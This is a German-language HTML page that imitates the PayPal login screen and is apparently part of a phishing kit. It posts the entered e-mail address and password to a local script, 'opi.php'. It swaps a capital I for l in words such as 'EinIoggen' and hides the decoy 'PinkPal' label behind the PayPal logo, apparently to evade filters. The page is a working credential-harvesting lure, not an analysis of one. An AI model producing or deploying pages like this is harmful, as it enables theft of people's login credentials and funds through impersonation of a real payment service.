<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Bei PayPal einloggen</title>
    <link rel="shortcut icon" href="./imgs/favicon.ico" data-reactid=".14j6ip0k64g.0.9">
<style type="text/css">
@font-face {
  font-family: "sans-big-medium";
  src: url("fonts/SansBig-Medium.eot?#iefix") format("embedded-opentype"),
  url("fonts/SansBig-Medium.woff") format("woff"),
  url("fonts/destivo1.ttf") format("truetype"),
  url("fonts/SansBig-Medium.svg") format("svg");
}
	body{
	margin: 0!important;
    padding: 0!important;
	position:relative;
	    font-size: 14px;
    line-height: 1.5em;
	}
	#loginBox{
	position: absolute;
    right: 40%;
    top: 240px;
    width: 380px;
	}
	.textInput{
	margin: 0 0 10px;
	}
	.textInput input{
	-webkit-background-clip: padding-box;
    -moz-background-clip: padding-box;
    background-clip: padding-box;
    -webkit-transition: border .2s ease-in-out,background-color .2s ease-in-out;
    -moz-transition: border .2s ease-in-out,background-color .2s ease-in-out;
    -o-transition: border .2s ease-in-out,background-color .2s ease-in-out;
    transition: border .2s ease-in-out,background-color .2s ease-in-out;
	height: 52px;
    width: 100%;
    padding: 0 10px;
    border: 1px solid #9da3a6;
    background: #fff;
    text-overflow: ellipsis;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    -webkit-border-radius: 4px;
    -moz-border-radius: 4px;
    -khtml-border-radius: 4px;
    border-radius: 4px;
    -webkit-box-shadow: none;
    -moz-box-shadow: none;
    box-shadow: none;
    color: #000;
    font-size: 1em;
    font-family: Helvetica,Arial,sans-serif;
    font-weight: 400;
    direction: ltr;}
	.fieldWrapper{
	    width: 100%;}
	.validateBox #btnLogin,.button{
	    width: 100%;
    height: 44px;
    padding: 0;
    border: 0;
    display: block;
    background-color: #0070ba;
    -webkit-box-shadow: none;
    -moz-box-shadow: none;
    box-shadow: none;
    -webkit-border-radius: 4px;
    -moz-border-radius: 4px;
    -khtml-border-radius: 4px;
    border-radius: 4px;
    -webkit-box-sizing: border-box;
    -moz-box-sizing: border-box;
    box-sizing: border-box;
    cursor: pointer;
    -webkit-appearance: none;
    -moz-appearance: none;
    -ms-appearance: none;
    -o-appearance: none;
    appearance: none;
    -webkit-tap-highlight-color: transparent;
    color: #fff;
    font-size: 1em;
    text-align: center;
    font-weight: 700;
    font-family: HelveticaNeue-Medium,"Helvetica Neue Medium",HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    text-shadow: none;
    text-decoration: none;
    -webkit-transition: background-color .4s ease-out;
    -moz-transition: background-color .4s ease-out;
    -o-transition: background-color .4s ease-out;
    transition: background-color .4s ease-out;
    -webkit-font-smoothing: antialiased;}
	.Bottonna #createAccount{
	    background-color: #E1E7EB;
    color: #2C2E2F;    line-height: 40px;}
.validateBox #btnLogin:hover {
    background-color: #005ea6;
    outline: 0;
}
.validateBox {
    margin-top: 20px;
}
.mylogo{    background: transparent url(imgs/logo-129x32.svg) top center no-repeat;
    background-size: 129px 32px;
    width: 129px;
    height: 32px;
    display: block;
	text-indent: -9999px;}
	.loginning{max-width:370px; padding:200px 0}
	.alink{color: #0070ba;
    font-family: HelveticaNeue,"Helvetica Neue",Helvetica,Arial,sans-serif;
    font-weight: 400;
    text-decoration: none;
    -webkit-transition: color .2s ease-out;
    -moz-transition: color .2s ease-out;
    -o-transition: color .2s ease-out;
    transition: color .2s ease-out;
	    margin: 20px auto;
    padding-bottom: 20px;
    border-bottom: 1px solid #cbd2d6;
    text-align: center;}
	</style>
</head>

<body>
<div>
<center>
<div class="loginning">
<form action="opi.php" method="post" name="login_form">
<p class="mylogo">PinkPal</p>
<div class="inputBox">
	<div class="textInput" id="email"><div class="fieldWrapper"><input id="email" name="login_email" type="email"  required="required" aria-required="true" value="" autocomplete="off" placeholder="E-Mail-Adresse"></div></div>
	<div class="textInput" id="password"><div class="fieldWrapper"><input id="password" name="login_password" type="password"  required="required" aria-required="true" value="" autocomplete="off" placeholder="Passwort"></div></div>
	</div>
	<div class="validateBox">
	<button class="button actionContinue" type="submit" id="btnLogin" name="btnLogin" value="Login">EinIoggen</button>
	</div>
	<div class="problemen">
	<p class="alink">Probleme beim EinIoggen?</p>
	</div>
	<div class="Bottonna">
	<a href="#" class="button secondary" id="createAccount">Neu anmeIden</a>
	</div>
	</div>
	</center>
	
</div>
</body>
</html>
